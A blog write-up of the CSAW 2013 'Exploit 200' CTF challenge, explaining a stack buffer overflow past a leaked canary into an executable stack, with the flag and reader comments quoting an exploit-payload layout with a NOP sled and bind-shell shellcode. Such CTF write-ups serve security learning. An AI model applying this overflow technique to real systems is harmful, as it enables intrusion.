Credit to Ryan
The first thing we did for this challenge was to
look at the program headers:
From the headers we can see that the stack is given
read, write, and execute permission therefore assuming the stack has enough
space and we can overflow the buffer, we should be able to place and execute
shell code on the stack. Looking at the assembly in IDA pro we see a few
interesting lines.
From the assembly we can calculate what the stack
will look like at run time:
As we can see the assembly the program is going to
do the following:
1. Create
a random canary value and save it into VAR_C
2. Send
the address that tops to the top of BUF
3. Send
the canary value
4. Send
the following string “Welcome to CSAW CTF.
Exploitation 2 will be a little harder this year. Insert your exploit here:”
5. Receive
4096 bytes and store them in BUF
6. If
the canary value has not been changed return else exit the program
So the program is
reading up to 4096 bytes into a 2048 byte buffer. We have a known address that
points to the top of the buffer and we have the canary value. So we need to
write an exploit program that will send the shellcode + canary value + buf
address to get the flag.
Flag = 53666e040caa855a9b27194c82a26366
Link to solution code: https://github.com/IAryan/CTFSolutions/tree/master/CSAW/2013/Exploit_200
key{53666e040caa855a9b27194c82a26366}
Hello, I am new in exploit tasks, I try to solve this challenge, but my exploit code excellent work on my local computer and bind shell to 127.0.0.1 port 11111. But when I sent code to remote server my code not work.
ReplyDeleteI try to understand what is wrong
I get shell codes from http://shell-storm.org/ instead of developing own
try all tcp shell codes most of them correctly work on my local computer but on remote server not work
Do you use your own developed shell code?
Given elf file is x86 32 bit my local computer is Ubuntu 32 bit
I think server os should be compatible
Also I read your python file and see that string:
# Create NOP sled
nop_sled = '\x90' * (BUFF_SIZE - len(shellcode) - len(PAD) )
# Expoit to send to server
exploit = nop_sled + shellcode + PAD + canary + filler + buf_address
why you add nop string?
my code was like
exploit = shellcode + CalculatedPadding + canary + 12bytepadding+ buf_address
after ret instruction EIP is on start of shellcode why you add additional padding with NOPs?
Why problem make when you no problem have you don't want to make.
ReplyDeleteMy main question is :
ReplyDeletewhy you add nop sled?
# Expoit to send to server
exploit = nop_sled + shellcode + PAD + canary + filler + buf_address
after ret instruction EIP is on start of shellcode why you add additional padding with NOPs?
Hello, I don't know if this blog is still alive however I want to know why there is a 12-byte padding after the canary(before the ret address.) Why is that? Can anyone please explain? Thanks.
ReplyDelete